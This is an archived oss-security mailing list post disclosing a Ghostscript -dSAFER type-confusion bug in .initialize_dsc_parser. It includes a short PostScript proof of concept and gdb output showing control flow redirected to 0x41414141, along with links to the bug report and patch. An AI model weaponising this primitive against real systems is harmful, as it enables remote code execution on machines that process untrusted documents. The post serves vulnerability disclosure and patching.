Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 5 Oct 2016 13:12:19 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems

On Wed, Oct 5, 2016 at 9:13 AM, Tavis Ormandy <taviso@...gle.com> wrote:
> bug: type confusion in .initialize_dsc_parser allows remote code execution
> id: http://bugs.ghostscript.com/show_bug.cgi?id=697190
> repro: http://bugs.ghostscript.com/show_bug.cgi?id=697190#c0
> patch: http://git.ghostscript.com/?p=ghostpdl.git;h=875a0095f37626a721c7ff57d606a0f95af03913

It was pointed out to me that my testcase doesn't work on the 9.0x
versions, because it doesn't allow encoding 64-bit integers, but it's
still exploitable.

For example, something like this should jump to 0x41414141:

$ cat test.ps
%!PS
[16#1 16#2 16#3 16#41414141 [16#4]] .initialize_dsc_parser
$ gdb -q -ex r --args gs -dSAFER -f test.ps
GPL Ghostscript 9.05 (2012-02-08)
Copyright (C) 2010 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.

Program received signal SIGSEGV, Segmentation fault.
0x0000000041414141 in ?? ()

Tavis.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.